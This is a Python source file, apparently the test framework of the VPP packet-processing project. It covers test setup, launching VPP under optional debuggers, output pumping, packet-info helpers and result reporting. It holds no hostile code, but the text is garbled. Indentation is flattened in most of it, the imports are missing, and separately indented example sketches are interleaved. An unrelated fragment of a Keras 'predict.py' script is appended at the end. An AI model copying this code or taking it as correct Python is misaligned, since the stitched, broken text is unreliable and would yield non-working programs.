"""
Test framework module.
The module provides a set of tools for constructing and running tests and
representing the results.
"""
class _PacketInfo(object):
"""Private class to create packet info object.
Help process information about the next packet.
Set variables to default values.
"""
#: Store the index of the packet.
index = -1
#: Store the index of the source packet generator interface of the packet.
src = -1
#: Store the index of the destination packet generator interface
#: of the packet.
dst = -1
#: Store expected ip version
ip = -1
#: Store expected upper protocol
proto = -1
#: Store the copy of the former packet.
data = None
def __eq__(self, other):
index = self.index == other.index
src = self.src == other.src
dst = self.dst == other.dst
data = self.data == other.data
return index and src and dst and data
def pump_output(testclass):
""" pump output from vpp stdout/stderr to proper queues """
stdout_fragment = ""
stderr_fragment = ""
while not testclass.pump_thread_stop_flag.wait(0):
readable = select.select([testclass.vpp.stdout.fileno(),
testclass.vpp.stderr.fileno(),
testclass.pump_thread_wakeup_pipe[0]],
[], [])[0]
if testclass.vpp.stdout.fileno() in readable:
read = os.read(testclass.vpp.stdout.fileno(), 102400)
if len(read) > 0:
split = read.splitlines(True)
if len(stdout_fragment) > 0:
split[0] = "%s%s" % (stdout_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stdout_fragment = split[-1]
testclass.vpp_stdout_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.debug(
"VPP STDOUT: %s" % line.rstrip("\n"))
if testclass.vpp.stderr.fileno() in readable:
read = os.read(testclass.vpp.stderr.fileno(), 102400)
if len(read) > 0:
split = read.splitlines(True)
if len(stderr_fragment) > 0:
split[0] = "%s%s" % (stderr_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stderr_fragment = split[-1]
testclass.vpp_stderr_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.debug(
"VPP STDERR: %s" % line.rstrip("\n"))
# ignoring the dummy pipe here intentionally - the flag will take care
# of properly terminating the loop
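# A minimal standalone sketch (not part of the framework itself) of the
# wake-up-pipe pattern used by pump_output() above: a reader thread blocks in
# select() on the data fd plus one end of a pipe, and another thread wakes it by
# writing a byte to the other end before setting the stop flag. All names here
# are illustrative.
def _example_wakeup_pipe_loop():
    import os
    import select
    import threading
    stop_flag = threading.Event()
    wakeup_r, wakeup_w = os.pipe()
    data_r, data_w = os.pipe()
    def reader():
        while not stop_flag.wait(0):
            readable = select.select([data_r, wakeup_r], [], [])[0]
            if data_r in readable:
                chunk = os.read(data_r, 4096)
                if chunk:
                    print("got %d bytes" % len(chunk))
            # the wakeup pipe is ignored on purpose; the flag ends the loop
    t = threading.Thread(target=reader)
    t.start()
    os.write(data_w, b"hello")
    stop_flag.set()
    os.write(wakeup_w, b"x")  # unblock select() so the flag is noticed
    t.join()
    for fd in (wakeup_r, wakeup_w, data_r, data_w):
        os.close(fd)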
def running_extended_tests():
s = os.getenv("EXTENDED_TESTS", "n")
return True if s.lower() in ("y", "yes", "1") else False
def running_on_centos():
os_id = os.getenv("OS_ID", "")
return True if "centos" in os_id.lower() else False
class KeepAliveReporter(object):
"""
Singleton object which reports test start to parent process
"""
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
@property
def pipe(self):
return self._pipe
@pipe.setter
def pipe(self, pipe):
if hasattr(self, '_pipe'):
raise Exception("Internal error - pipe should only be set once.")
self._pipe = pipe
def send_keep_alive(self, test):
"""
Write current test tmpdir & desc to keep-alive pipe to signal liveness
"""
if self.pipe is None:
# if not running forked..
return
if isclass(test):
desc = test.__name__
else:
desc = test.shortDescription()
if not desc:
desc = str(test)
self.pipe.send((desc, test.vpp_bin, test.tempdir, test.vpp.pid))
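# KeepAliveReporter (and TestCasePrinter further below) use the Borg pattern:
# every instance shares one __dict__, so state such as the keep-alive pipe is
# effectively process-global without an explicit singleton. A tiny standalone
# illustration (the _BorgExampleCounter name is made up for this sketch):
class _BorgExampleCounter(object):
    _shared_state = {}
    def __init__(self):
        self.__dict__ = self._shared_state
        if not hasattr(self, 'count'):
            self.count = 0
    def bump(self):
        self.count += 1
        return self.count
# _BorgExampleCounter().bump() -> 1
# _BorgExampleCounter().bump() -> 2   (a *new* instance sees the same state)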
class VppTestCase(unittest.TestCase):
"""This subclass is a base class for VPP test cases that are implemented as
    classes. It provides methods to create and run test cases.
"""
@property
def packet_infos(self):
"""List of packet infos"""
return self._packet_infos
@classmethod
def get_packet_count_for_if_idx(cls, dst_if_index):
"""Get the number of packet info for specified destination if index"""
if dst_if_index in cls._packet_count_for_dst_if_idx:
return cls._packet_count_for_dst_if_idx[dst_if_index]
else:
return 0
@classmethod
def instance(cls):
"""Return the instance of this testcase"""
return cls.test_instance
@classmethod
def set_debug_flags(cls, d):
cls.debug_core = False
cls.debug_gdb = False
cls.debug_gdbserver = False
if d is None:
return
dl = d.lower()
if dl == "core":
cls.debug_core = True
elif dl == "gdb":
cls.debug_gdb = True
elif dl == "gdbserver":
cls.debug_gdbserver = True
else:
raise Exception("Unrecognized DEBUG option: '%s'" % d)
@classmethod
def setUpConstants(cls):
""" Set-up the test case class based on environment variables """
s = os.getenv("STEP", "n")
cls.step = True if s.lower() in ("y", "yes", "1") else False
d = os.getenv("DEBUG", None)
c = os.getenv("CACHE_OUTPUT", "1")
cls.cache_vpp_output = False if c.lower() in ("n", "no", "0") else True
cls.set_debug_flags(d)
cls.vpp_bin = os.getenv('VPP_TEST_BIN', "vpp")
cls.plugin_path = os.getenv('VPP_TEST_PLUGIN_PATH')
cls.extern_plugin_path = os.getenv('EXTERN_PLUGINS')
plugin_path = None
if cls.plugin_path is not None:
if cls.extern_plugin_path is not None:
plugin_path = "%s:%s" % (
cls.plugin_path, cls.extern_plugin_path)
else:
plugin_path = cls.plugin_path
elif cls.extern_plugin_path is not None:
plugin_path = cls.extern_plugin_path
debug_cli = ""
if cls.step or cls.debug_gdb or cls.debug_gdbserver:
debug_cli = "cli-listen localhost:5002"
coredump_size = None
size = os.getenv("COREDUMP_SIZE")
if size is not None:
coredump_size = "coredump-size %s" % size
if coredump_size is None:
coredump_size = "coredump-size unlimited"
cls.vpp_cmdline = [cls.vpp_bin, "unix",
"{", "nodaemon", debug_cli, "full-coredump",
coredump_size, "}", "api-trace", "{", "on", "}",
"api-segment", "{", "prefix", cls.shm_prefix, "}",
"plugins", "{", "plugin", "dpdk_plugin.so", "{",
"disable", "}", "}", ]
if plugin_path is not None:
cls.vpp_cmdline.extend(["plugin_path", plugin_path])
cls.logger.info("vpp_cmdline: %s" % cls.vpp_cmdline)
@classmethod
def wait_for_enter(cls):
if cls.debug_gdbserver:
print(double_line_delim)
print("Spawned GDB server with PID: %d" % cls.vpp.pid)
elif cls.debug_gdb:
print(double_line_delim)
print("Spawned VPP with PID: %d" % cls.vpp.pid)
else:
cls.logger.debug("Spawned VPP with PID: %d" % cls.vpp.pid)
return
print(single_line_delim)
print("You can debug the VPP using e.g.:")
if cls.debug_gdbserver:
print("gdb " + cls.vpp_bin + " -ex 'target remote localhost:7777'")
print("Now is the time to attach a gdb by running the above "
"command, set up breakpoints etc. and then resume VPP from "
"within gdb by issuing the 'continue' command")
elif cls.debug_gdb:
print("gdb " + cls.vpp_bin + " -ex 'attach %s'" % cls.vpp.pid)
print("Now is the time to attach a gdb by running the above "
"command and set up breakpoints etc.")
print(single_line_delim)
raw_input("Press ENTER to continue running the testcase...")
@classmethod
def run_vpp(cls):
cmdline = cls.vpp_cmdline
if cls.debug_gdbserver:
gdbserver = '/usr/bin/gdbserver'
if not os.path.isfile(gdbserver) or \
not os.access(gdbserver, os.X_OK):
raise Exception("gdbserver binary '%s' does not exist or is "
"not executable" % gdbserver)
cmdline = [gdbserver, 'localhost:7777'] + cls.vpp_cmdline
cls.logger.info("Gdbserver cmdline is %s", " ".join(cmdline))
try:
cls.vpp = subprocess.Popen(cmdline,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=1)
except Exception as e:
cls.logger.critical("Couldn't start vpp: %s" % e)
raise
cls.wait_for_enter()
@classmethod
def setUpClass(cls):
"""
Perform class setup before running the testcase
Remove shared memory files, start vpp and connect the vpp-api
"""
gc.collect() # run garbage collection first
random.seed()
cls.logger = getLogger(cls.__name__)
cls.tempdir = tempfile.mkdtemp(
prefix='vpp-unittest-%s-' % cls.__name__)
cls.file_handler = FileHandler("%s/log.txt" % cls.tempdir)
cls.file_handler.setFormatter(
Formatter(fmt='%(asctime)s,%(msecs)03d %(message)s',
datefmt="%H:%M:%S"))
cls.file_handler.setLevel(DEBUG)
cls.logger.addHandler(cls.file_handler)
cls.shm_prefix = cls.tempdir.split("/")[-1]
os.chdir(cls.tempdir)
cls.logger.info("Temporary dir is %s, shm prefix is %s",
cls.tempdir, cls.shm_prefix)
cls.setUpConstants()
cls.reset_packet_infos()
cls._captures = []
cls._zombie_captures = []
cls.verbose = 0
cls.vpp_dead = False
cls.registry = VppObjectRegistry()
cls.vpp_startup_failed = False
cls.reporter = KeepAliveReporter()
# need to catch exceptions here because if we raise, then the cleanup
# doesn't get called and we might end with a zombie vpp
try:
cls.run_vpp()
cls.reporter.send_keep_alive(cls)
cls.vpp_stdout_deque = deque()
cls.vpp_stderr_deque = deque()
cls.pump_thread_stop_flag = Event()
cls.pump_thread_wakeup_pipe = os.pipe()
cls.pump_thread = Thread(target=pump_output, args=(cls,))
cls.pump_thread.daemon = True
cls.pump_thread.start()
cls.vapi = VppPapiProvider(cls.shm_prefix, cls.shm_prefix, cls)
if cls.step:
hook = StepHook(cls)
else:
hook = PollHook(cls)
cls.vapi.register_hook(hook)
cls.sleep(0.1, "after vpp startup, before initial poll")
try:
hook.poll_vpp()
except VppDiedError:
cls.vpp_startup_failed = True
cls.logger.critical(
"VPP died shortly after startup, check the"
" output to standard error for possible cause")
raise
try:
cls.vapi.connect()
except Exception:
try:
cls.vapi.disconnect()
except Exception:
pass
if cls.debug_gdbserver:
print(colorize("You're running VPP inside gdbserver but "
"VPP-API connection failed, did you forget "
"to 'continue' VPP from within gdb?", RED))
raise
except Exception:
try:
cls.quit()
except Exception:
pass
raise
@classmethod
def quit(cls):
"""
Disconnect vpp-api, kill vpp and cleanup shared memory files
"""
if (cls.debug_gdbserver or cls.debug_gdb) and hasattr(cls, 'vpp'):
cls.vpp.poll()
if cls.vpp.returncode is None:
print(double_line_delim)
print("VPP or GDB server is still running")
print(single_line_delim)
raw_input("When done debugging, press ENTER to kill the "
"process and finish running the testcase...")
os.write(cls.pump_thread_wakeup_pipe[1], 'ding dong wake up')
cls.pump_thread_stop_flag.set()
if hasattr(cls, 'pump_thread'):
cls.logger.debug("Waiting for pump thread to stop")
cls.pump_thread.join()
if hasattr(cls, 'vpp_stderr_reader_thread'):
cls.logger.debug("Waiting for stdderr pump to stop")
cls.vpp_stderr_reader_thread.join()
if hasattr(cls, 'vpp'):
if hasattr(cls, 'vapi'):
cls.vapi.disconnect()
del cls.vapi
cls.vpp.poll()
if cls.vpp.returncode is None:
cls.logger.debug("Sending TERM to vpp")
cls.vpp.terminate()
cls.logger.debug("Waiting for vpp to die")
cls.vpp.communicate()
del cls.vpp
if cls.vpp_startup_failed:
stdout_log = cls.logger.info
stderr_log = cls.logger.critical
else:
stdout_log = cls.logger.info
stderr_log = cls.logger.info
if hasattr(cls, 'vpp_stdout_deque'):
stdout_log(single_line_delim)
stdout_log('VPP output to stdout while running %s:', cls.__name__)
stdout_log(single_line_delim)
vpp_output = "".join(cls.vpp_stdout_deque)
with open(cls.tempdir + '/vpp_stdout.txt', 'w') as f:
f.write(vpp_output)
stdout_log('\n%s', vpp_output)
stdout_log(single_line_delim)
if hasattr(cls, 'vpp_stderr_deque'):
stderr_log(single_line_delim)
stderr_log('VPP output to stderr while running %s:', cls.__name__)
stderr_log(single_line_delim)
vpp_output = "".join(cls.vpp_stderr_deque)
with open(cls.tempdir + '/vpp_stderr.txt', 'w') as f:
f.write(vpp_output)
stderr_log('\n%s', vpp_output)
stderr_log(single_line_delim)
@classmethod
def tearDownClass(cls):
""" Perform final cleanup after running all tests in this test-case """
cls.quit()
cls.file_handler.close()
cls.reset_packet_infos()
if debug_framework:
debug_internal.on_tear_down_class(cls)
def tearDown(self):
""" Show various debug prints after each test """
self.logger.debug("--- tearDown() for %s.%s(%s) called ---" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
if not self.vpp_dead:
self.logger.debug(self.vapi.cli("show trace"))
self.logger.info(self.vapi.ppcli("show interface"))
self.logger.info(self.vapi.ppcli("show hardware"))
self.logger.info(self.vapi.ppcli("show error"))
self.logger.info(self.vapi.ppcli("show run"))
self.registry.remove_vpp_config(self.logger)
# Save/Dump VPP api trace log
api_trace = "vpp_api_trace.%s.log" % self._testMethodName
tmp_api_trace = "/tmp/%s" % api_trace
vpp_api_trace_log = "%s/%s" % (self.tempdir, api_trace)
self.logger.info(self.vapi.ppcli("api trace save %s" % api_trace))
self.logger.info("Moving %s to %s\n" % (tmp_api_trace,
vpp_api_trace_log))
os.rename(tmp_api_trace, vpp_api_trace_log)
self.logger.info(self.vapi.ppcli("api trace custom-dump %s" %
vpp_api_trace_log))
else:
self.registry.unregister_all(self.logger)
def setUp(self):
""" Clear trace before running each test"""
self.reporter.send_keep_alive(self)
self.logger.debug("--- setUp() for %s.%s(%s) called ---" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
if self.vpp_dead:
raise Exception("VPP is dead when setting up the test")
self.sleep(.1, "during setUp")
self.vpp_stdout_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vpp_stderr_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vapi.cli("clear trace")
# store the test instance inside the test class - so that objects
# holding the class can access instance methods (like assertEqual)
type(self).test_instance = self
@classmethod
def pg_enable_capture(cls, interfaces=None):
"""
Enable capture on packet-generator interfaces
:param interfaces: iterable interface indexes (if None,
use self.pg_interfaces)
"""
if interfaces is None:
interfaces = cls.pg_interfaces
for i in interfaces:
i.enable_capture()
@classmethod
def register_capture(cls, cap_name):
""" Register a capture in the testclass """
# add to the list of captures with current timestamp
cls._captures.append((time.time(), cap_name))
# filter out from zombies
cls._zombie_captures = [(stamp, name)
for (stamp, name) in cls._zombie_captures
if name != cap_name]
@classmethod
def pg_start(cls):
""" Remove any zombie captures and enable the packet generator """
# how long before capture is allowed to be deleted - otherwise vpp
# crashes - 100ms seems enough (this shouldn't be needed at all)
capture_ttl = 0.1
now = time.time()
for stamp, cap_name in cls._zombie_captures:
wait = stamp + capture_ttl - now
if wait > 0:
cls.sleep(wait, "before deleting capture %s" % cap_name)
now = time.time()
cls.logger.debug("Removing zombie capture %s" % cap_name)
cls.vapi.cli('packet-generator delete %s' % cap_name)
cls.vapi.cli("trace add pg-input 50") # 50 is maximum
cls.vapi.cli('packet-generator enable')
cls._zombie_captures = cls._captures
cls._captures = []
@classmethod
def create_pg_interfaces(cls, interfaces):
"""
Create packet-generator interfaces.
:param interfaces: iterable indexes of the interfaces.
:returns: List of created interfaces.
"""
result = []
for i in interfaces:
intf = VppPGInterface(cls, i)
setattr(cls, intf.name, intf)
result.append(intf)
cls.pg_interfaces = result
return result
@classmethod
def create_loopback_interfaces(cls, interfaces):
"""
Create loopback interfaces.
:param interfaces: iterable indexes of the interfaces.
:returns: List of created interfaces.
"""
result = []
for i in interfaces:
intf = VppLoInterface(cls, i)
setattr(cls, intf.name, intf)
result.append(intf)
cls.lo_interfaces = result
return result
@staticmethod
def extend_packet(packet, size, padding=' '):
"""
Extend packet to given size by padding with spaces or custom padding
NOTE: Currently works only when Raw layer is present.
:param packet: packet
:param size: target size
:param padding: padding used to extend the payload
"""
packet_len = len(packet) + 4
extend = size - packet_len
if extend > 0:
num = (extend / len(padding)) + 1
packet[Raw].load += (padding * num)[:extend]
@classmethod
def reset_packet_infos(cls):
""" Reset the list of packet info objects and packet counts to zero """
cls._packet_infos = {}
cls._packet_count_for_dst_if_idx = {}
@classmethod
def create_packet_info(cls, src_if, dst_if):
"""
Create packet info object containing the source and destination indexes
and add it to the testcase's packet info list
:param VppInterface src_if: source interface
:param VppInterface dst_if: destination interface
:returns: _PacketInfo object
"""
info = _PacketInfo()
info.index = len(cls._packet_infos)
info.src = src_if.sw_if_index
info.dst = dst_if.sw_if_index
if isinstance(dst_if, VppSubInterface):
dst_idx = dst_if.parent.sw_if_index
else:
dst_idx = dst_if.sw_if_index
if dst_idx in cls._packet_count_for_dst_if_idx:
cls._packet_count_for_dst_if_idx[dst_idx] += 1
else:
cls._packet_count_for_dst_if_idx[dst_idx] = 1
cls._packet_infos[info.index] = info
return info
@staticmethod
def info_to_payload(info):
"""
Convert _PacketInfo object to packet payload
:param info: _PacketInfo object
:returns: string containing serialized data from packet info
"""
return "%d %d %d %d %d" % (info.index, info.src, info.dst,
info.ip, info.proto)
@staticmethod
def payload_to_info(payload):
"""
Convert packet payload to _PacketInfo object
:param payload: packet payload
:returns: _PacketInfo object containing de-serialized data from payload
"""
numbers = payload.split()
info = _PacketInfo()
info.index = int(numbers[0])
info.src = int(numbers[1])
info.dst = int(numbers[2])
info.ip = int(numbers[3])
info.proto = int(numbers[4])
return info
def get_next_packet_info(self, info):
"""
Iterate over the packet info list stored in the testcase
Start iteration with first element if info is None
Continue based on index in info if info is specified
:param info: info or None
:returns: next info in list or None if no more infos
"""
if info is None:
next_index = 0
else:
next_index = info.index + 1
if next_index == len(self._packet_infos):
return None
else:
return self._packet_infos[next_index]
def get_next_packet_info_for_interface(self, src_index, info):
"""
Search the packet info list for the next packet info with same source
interface index
:param src_index: source interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info(info)
if info is None:
return None
if info.src == src_index:
return info
def get_next_packet_info_for_interface2(self, src_index, dst_index, info):
"""
Search the packet info list for the next packet info with same source
and destination interface indexes
:param src_index: source interface index to search for
:param dst_index: destination interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info_for_interface(src_index, info)
if info is None:
return None
if info.dst == dst_index:
return info
def assert_equal(self, real_value, expected_value, name_or_class=None):
if name_or_class is None:
self.assertEqual(real_value, expected_value)
return
try:
msg = "Invalid %s: %d('%s') does not match expected value %d('%s')"
msg = msg % (getdoc(name_or_class).strip(),
real_value, str(name_or_class(real_value)),
expected_value, str(name_or_class(expected_value)))
except Exception:
msg = "Invalid %s: %s does not match expected value %s" % (
name_or_class, real_value, expected_value)
self.assertEqual(real_value, expected_value, msg)
def assert_in_range(self,
real_value,
expected_min,
expected_max,
name=None):
if name is None:
msg = None
else:
msg = "Invalid %s: %s out of range <%s,%s>" % (
name, real_value, expected_min, expected_max)
self.assertTrue(expected_min <= real_value <= expected_max, msg)
@classmethod
def sleep(cls, timeout, remark=None):
if hasattr(cls, 'logger'):
cls.logger.debug("Starting sleep for %ss (%s)" % (timeout, remark))
before = time.time()
time.sleep(timeout)
after = time.time()
if after - before > 2 * timeout:
cls.logger.error("unexpected time.sleep() result - "
"slept for %ss instead of ~%ss!" % (
after - before, timeout))
if hasattr(cls, 'logger'):
cls.logger.debug(
"Finished sleep (%s) - slept %ss (wanted %ss)" % (
remark, after - before, timeout))
def send_and_assert_no_replies(self, intf, pkts, remark=""):
self.vapi.cli("clear trace")
intf.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
timeout = 1
for i in self.pg_interfaces:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured(remark=remark)
timeout = 0.1
def send_and_expect(self, input, pkts, output):
self.vapi.cli("clear trace")
input.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = output.get_capture(len(pkts))
return rx
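# Illustrative sketch only (not part of the framework) of how the packet-info
# helpers above are typically combined inside a test; the interface attributes
# and index values are hypothetical:
#
#     info = self.create_packet_info(self.pg0, self.pg1)
#     payload = self.info_to_payload(info)      # five space-separated integers
#     # ...embed payload in the packet's Raw layer, send and capture...
#     restored = self.payload_to_info(captured_payload)
#     assert restored.index == info.index and restored.src == info.src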
class TestCasePrinter(object):
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
if not hasattr(self, "_test_case_set"):
self._test_case_set = set()
def print_test_case_heading_if_first_time(self, case):
if case.__class__ not in self._test_case_set:
print(double_line_delim)
print(colorize(getdoc(case.__class__).splitlines()[0], YELLOW))
print(double_line_delim)
self._test_case_set.add(case.__class__)
class VppTestResult(unittest.TestResult):
"""
@property result_string
String variable to store the test case result string.
@property errors
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test which
raised an unexpected exception.
@property failures
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test where
a failure was explicitly signalled using the TestCase.assert*()
methods.
"""
def __init__(self, stream, descriptions, verbosity):
"""
        :param stream: File descriptor used to report test results;
            defaults to the standard error stream.
        :param descriptions: Boolean flag controlling whether to use
            test case descriptions.
        :param verbosity: Integer specifying the required verbosity level.
"""
unittest.TestResult.__init__(self, stream, descriptions, verbosity)
self.stream = stream
self.descriptions = descriptions
self.verbosity = verbosity
self.result_string = None
self.printer = TestCasePrinter()
def addSuccess(self, test):
"""
Record a test succeeded result
:param test:
"""
if hasattr(test, 'logger'):
test.logger.debug("--- addSuccess() %s.%s(%s) called"
% (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc))
unittest.TestResult.addSuccess(self, test)
self.result_string = colorize("OK", GREEN)
def addSkip(self, test, reason):
"""
Record a test skipped.
:param test:
:param reason:
"""
if hasattr(test, 'logger'):
test.logger.debug("--- addSkip() %s.%s(%s) called, reason is %s"
% (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc,
reason))
unittest.TestResult.addSkip(self, test, reason)
self.result_string = colorize("SKIP", YELLOW)
def symlink_failed(self, test):
logger = None
if hasattr(test, 'logger'):
logger = test.logger
if hasattr(test, 'tempdir'):
try:
failed_dir = os.getenv('VPP_TEST_FAILED_DIR')
link_path = '%s/%s-FAILED' % (failed_dir,
test.tempdir.split("/")[-1])
if logger:
logger.debug("creating a link to the failed test")
logger.debug("os.symlink(%s, %s)" %
(test.tempdir, link_path))
os.symlink(test.tempdir, link_path)
except Exception as e:
if logger:
logger.error(e)
def send_failure_through_pipe(self, test):
if hasattr(self, 'test_framework_failed_pipe'):
pipe = self.test_framework_failed_pipe
if pipe:
pipe.send(test.__class__)
def addFailure(self, test, err):
"""
Record a test failed result
:param test:
:param err: error message
"""
if hasattr(test, 'logger'):
test.logger.debug("--- addFailure() %s.%s(%s) called, err is %s"
% (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc, err))
test.logger.debug("formatted exception is:\n%s" %
"".join(format_exception(*err)))
unittest.TestResult.addFailure(self, test, err)
if hasattr(test, 'tempdir'):
self.result_string = colorize("FAIL", RED) + \
' [ temp dir used by test case: ' + test.tempdir + ' ]'
self.symlink_failed(test)
else:
self.result_string = colorize("FAIL", RED) + ' [no temp dir]'
self.send_failure_through_pipe(test)
def addError(self, test, err):
"""
Record a test error result
:param test:
:param err: error message
"""
if hasattr(test, 'logger'):
test.logger.debug("--- addError() %s.%s(%s) called, err is %s"
% (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc, err))
test.logger.debug("formatted exception is:\n%s" %
"".join(format_exception(*err)))
unittest.TestResult.addError(self, test, err)
if hasattr(test, 'tempdir'):
self.result_string = colorize("ERROR", RED) + \
' [ temp dir used by test case: ' + test.tempdir + ' ]'
self.symlink_failed(test)
else:
self.result_string = colorize("ERROR", RED) + ' [no temp dir]'
self.send_failure_through_pipe(test)
def getDescription(self, test):
"""
Get test description
:param test:
:returns: test description
"""
        # TODO: if None, print a warning instead of raising an exception
short_description = test.shortDescription()
if self.descriptions and short_description:
return short_description
else:
return str(test)
def startTest(self, test):
"""
Start a test
:param test:
"""
self.printer.print_test_case_heading_if_first_time(test)
unittest.TestResult.startTest(self, test)
if self.verbosity > 0:
self.stream.writeln(
"Starting " + self.getDescription(test) + " ...")
self.stream.writeln(single_line_delim)
def stopTest(self, test):
"""
Stop a test
:param test:
"""
unittest.TestResult.stopTest(self, test)
if self.verbosity > 0:
self.stream.writeln(single_line_delim)
self.stream.writeln("%-73s%s" % (self.getDescription(test),
self.result_string))
self.stream.writeln(single_line_delim)
else:
self.stream.writeln("%-73s%s" % (self.getDescription(test),
self.result_string))
def printErrors(self):
"""
Print errors from running the test case
"""
self.stream.writeln()
self.printErrorList('ERROR', self.errors)
self.printErrorList('FAIL', self.failures)
def printErrorList(self, flavour, errors):
"""
Print error list to the output stream together with error type
and test case description.
:param flavour: error type
:param errors: iterable errors
"""
for test, err in errors:
self.stream.writeln(double_line_delim)
self.stream.writeln("%s: %s" %
(flavour, self.getDescription(test)))
self.stream.writeln(single_line_delim)
self.stream.writeln("%s" % err)
class Filter_by_test_option:
def __init__(self, filter_file_name, filter_class_name, filter_func_name):
self.filter_file_name = filter_file_name
self.filter_class_name = filter_class_name
self.filter_func_name = filter_func_name
def __call__(self, file_name, class_name, func_name):
if self.filter_file_name and file_name != self.filter_file_name:
return False
if self.filter_class_name and class_name != self.filter_class_name:
return False
if self.filter_func_name and func_name != self.filter_func_name:
return False
return True
class VppTestRunner(unittest.TextTestRunner):
"""
A basic test runner implementation which prints results to standard error.
"""
@property
def resultclass(self):
"""Class maintaining the results of the tests"""
return VppTestResult
def __init__(self, keep_alive_pipe=None, failed_pipe=None,
stream=sys.stderr, descriptions=True,
verbosity=1, failfast=False, buffer=False, resultclass=None):
# ignore stream setting here, use hard-coded stdout to be in sync
# with prints from VppTestCase methods ...
super(VppTestRunner, self).__init__(sys.stdout, descriptions,
verbosity, failfast, buffer,
resultclass)
reporter = KeepAliveReporter()
reporter.pipe = keep_alive_pipe
# this is super-ugly, but very simple to implement and works as long
# as we run only one test at the same time
VppTestResult.test_framework_failed_pipe = failed_pipe
test_option = "TEST"
def parse_test_option(self):
f = os.getenv(self.test_option, None)
filter_file_name = None
filter_class_name = None
filter_func_name = None
if f:
if '.' in f:
parts = f.split('.')
if len(parts) > 3:
raise Exception("Unrecognized %s option: %s" %
(self.test_option, f))
if len(parts) > 2:
if parts[2] not in ('*', ''):
filter_func_name = parts[2]
if parts[1] not in ('*', ''):
filter_class_name = parts[1]
if parts[0] not in ('*', ''):
if parts[0].startswith('test_'):
filter_file_name = parts[0]
else:
filter_file_name = 'test_%s' % parts[0]
else:
if f.startswith('test_'):
filter_file_name = f
else:
filter_file_name = 'test_%s' % f
return filter_file_name, filter_class_name, filter_func_name
@staticmethod
def filter_tests(tests, filter_cb):
result = unittest.suite.TestSuite()
for t in tests:
if isinstance(t, unittest.suite.TestSuite):
# this is a bunch of tests, recursively filter...
x = VppTestRunner.filter_tests(t, filter_cb)
if x.countTestCases() > 0:
result.addTest(x)
elif isinstance(t, unittest.TestCase):
# this is a single test
parts = t.id().split('.')
# t.id() for common cases like this:
# test_classifier.TestClassifier.test_acl_ip
# apply filtering only if it is so
if len(parts) == 3:
if not filter_cb(parts[0], parts[1], parts[2]):
continue
result.addTest(t)
else:
# unexpected object, don't touch it
result.addTest(t)
return result
def run(self, test):
"""
Run the tests
:param test:
"""
faulthandler.enable() # emit stack trace to stderr if killed by signal
print("Running tests using custom test runner") # debug message
filter_file, filter_class, filter_func = self.parse_test_option()
print("Active filters: file=%s, class=%s, function=%s" % (
filter_file, filter_class, filter_func))
filter_cb = Filter_by_test_option(
filter_file, filter_class, filter_func)
filtered = self.filter_tests(test, filter_cb)
print("%s out of %s tests match specified filters" % (
filtered.countTestCases(), test.countTestCases()))
if not running_extended_tests():
print("Not running extended tests (some tests will be skipped)")
return super(VppTestRunner, self).run(filtered)
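# For reference only (values are illustrative), the TEST environment variable
# consumed by parse_test_option() above selects tests roughly as follows:
#
#     TEST=ip4                       -> everything in test_ip4.py
#     TEST=test_ip4.TestIPv4         -> a single test class
#     TEST=ip4.TestIPv4.test_lookup  -> a single test method
#
# A '*' or empty component acts as a wildcard for that position.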
class Worker(Thread):
    def __init__(self, args, logger, env=None):
        self.logger = logger
        self.args = args
        self.result = None
        self.env = copy.deepcopy(env) if env else {}
        super(Worker, self).__init__()
def run(self):
executable = self.args[0]
self.logger.debug("Running executable w/args `%s'" % self.args)
env = os.environ.copy()
env.update(self.env)
env["CK_LOG_FILE_NAME"] = "-"
self.process = subprocess.Popen(
self.args, shell=False, env=env, preexec_fn=os.setpgrp,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = self.process.communicate()
self.logger.debug("Finished running `%s'" % executable)
self.logger.info("Return code is `%s'" % self.process.returncode)
self.logger.info(single_line_delim)
self.logger.info("Executable `%s' wrote to stdout:" % executable)
self.logger.info(single_line_delim)
self.logger.info(out)
self.logger.info(single_line_delim)
self.logger.info("Executable `%s' wrote to stderr:" % executable)
self.logger.info(single_line_delim)
self.logger.info(err)
self.logger.info(single_line_delim)
self.result = self.process.returncode
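if __name__ == "__main__":
    # Minimal usage sketch for the Worker helper above; runs only when this
    # module is executed directly. The executable and logger name are examples.
    import logging
    logging.basicConfig(level=logging.DEBUG)
    _demo_logger = logging.getLogger("worker-demo")
    _worker = Worker(["/bin/echo", "hello"], _demo_logger)
    _worker.start()
    _worker.join()
    _demo_logger.info("Worker finished with return code %s" % _worker.result)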
|
predict.py
|
from keras.models import load_model
from vis.utils import utils
import os
import numpy as np
import json
import tensorflow as tf
import time
import socket
import threading
import uuid
from sqldb import inserst
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.2
session = tf.Session(config=config)
model = load_model("all_group_299v4.h5")
with open("all_group_299v4.json", 'r') as load_f:
load_dict = json.load(load_f)
